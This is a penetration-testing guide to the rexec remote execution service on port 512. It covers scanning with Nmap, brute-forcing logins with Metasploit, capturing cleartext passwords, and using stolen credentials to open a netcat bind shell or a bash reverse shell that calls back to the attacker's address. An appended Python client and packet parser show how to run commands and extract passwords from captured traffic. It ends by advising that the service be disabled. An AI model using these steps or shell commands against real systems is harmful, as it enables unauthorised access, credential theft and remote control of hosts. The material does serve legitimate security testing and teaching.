Rexec - Port 512

It is a service that allows you to execute a command inside a host if you know valid credentials (username and password).


Basic Info

rexec (remote exec, served by rexecd) lets a client run a command on the host over TCP port 512 if it presents a valid username and password. Unlike rsh/rlogin there is no trusted-host (.rhosts) mechanism, so possession of credentials is all that is checked. The credentials and the command are sent in cleartext, so anyone who can capture the traffic obtains them without any guessing.

Default Port: 512

PORT    STATE SERVICE
512/tcp open  exec

Scanning for Hosts

Start by using Nmap to scan for hosts with port 512 open, which is the default port for Rexec (Nmap labels it exec):

nmap -sT -sV -p 512 <target_ip_range>

The -sV probe confirms that something answers as rexecd rather than an unrelated service that happens to sit on that port. This will help identify potential targets with the Rexec service running.

Brute-Forcing Credentials

Use Metasploit's auxiliary/scanner/rservices/rexec_login module to brute-force username and password combinations:

Load the module:

use auxiliary/scanner/rservices/rexec_login

Set the target and options, such as username and password files:

set RHOSTS <target_ip> 
set USER_FILE /path/to/usernames.txt 
set PASS_FILE /path/to/passwords.txt
run

This tries every username/password pair from the two lists against the service and reports the ones rexecd accepts. Online guessing is noisy (each attempt is a separate connection and may be logged on the target), so if you can see legitimate traffic to port 512 it is usually quicker to capture a real session: the password is sent in cleartext, so a packet capture yields it directly.

Exploiting with Command Execution

Once credentials are obtained, use the rexec client to run an arbitrary command on the target. The examples below use the netkit-style client syntax (-l user, -p password); note that the password is sent in cleartext, so these commands expose it to anyone on the network path.

Bind shell: make the target listen and hand the connection a shell. This needs a netcat build that supports -e (for example netcat-traditional or ncat); the OpenBSD variant does not:

rexec -l username -p password rhost "nc -l -p 1234 -e /bin/bash"

Then connect to the listener from your machine (nc -l would start a second listener rather than connect to the one you just opened):

nc -nv rhost 1234

Alternatively, set up a reverse shell. Start a listener on your machine first:

nc -lnvp <your_port>

and then make the target connect back to it:

rexec -l username -p password rhost "bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'"
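The exchange behind those commands, as an added example that is not part of the original page: a minimal rexec client written here in Python that speaks the wire protocol directly (the client sends four NUL-terminated strings, the server answers with a status byte followed by the command output or an error line), plus a parser for the client payload exactly as a packet capture or IDS on port 512 would see it. The host, credentials and command in the main section are placeholder values, not from the page.

```python
import socket

REXEC_PORT = 512


def build_rexec_request(username: str, password: str, command: str,
                        stderr_port: int = 0) -> bytes:
    """Client half of the exchange, as rexecd(8) expects it:
    "<stderr port>\\0<user>\\0<password>\\0<command>\\0".
    A stderr port of 0 means no separate stderr connection.  Nothing is
    hashed or encrypted: the password leaves the client exactly as typed."""
    for field in (username, password, command):
        if "\0" in field:
            raise ValueError("rexec fields are NUL-terminated and cannot contain NUL")
    return f"{stderr_port}\0{username}\0{password}\0{command}\0".encode()


def parse_rexec_request(payload: bytes) -> dict:
    """Recover user, password and command from a captured client payload on
    TCP/512 (what a sniffer or IDS sees).  Anything after the fourth NUL is
    stdin data destined for the remote command."""
    parts = payload.split(b"\0", 4)
    if len(parts) < 5:
        raise ValueError("truncated rexec request")
    port, user, password, command, stdin = parts
    return {
        "stderr_port": int(port),
        "user": user.decode(errors="replace"),
        "password": password.decode(errors="replace"),
        "command": command.decode(errors="replace"),
        "stdin": stdin,
    }


def parse_rexec_response(data: bytes) -> tuple:
    """Server reply: a leading 0x00 byte means the command was accepted and
    the rest of the stream is its output; 0x01 is followed by a diagnostic
    line such as "Login incorrect."."""
    if not data:
        raise ValueError("server closed the connection without a status byte")
    status, body = data[0], data[1:]
    if status == 0:
        return True, body
    if status == 1:
        return False, body.rstrip(b"\n")
    raise ValueError(f"unexpected rexec status byte {status:#04x}")


def rexec(host: str, username: str, password: str, command: str,
          port: int = REXEC_PORT, timeout: float = 10.0) -> tuple:
    """Run `command` on `host` via rexec; returns (accepted, output_bytes)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_rexec_request(username, password, command))
        # Half-close: we send no stdin, so the remote command sees EOF and
        # the server closes the connection when the command exits.
        sock.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_rexec_response(b"".join(chunks))


if __name__ == "__main__":
    # Placeholder target and credentials (assumed values, not from the page).
    accepted, output = rexec("192.0.2.10", "username", "password", "id")
    print("accepted" if accepted else "rejected", output.decode(errors="replace"))
```

parse_rexec_request is the defender's view: feeding it the first client-to-server segment of any port 512 flow returns the username and password in the clear, which is why the only real fix is to disable rexecd and use SSH rather than to harden the passwords.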
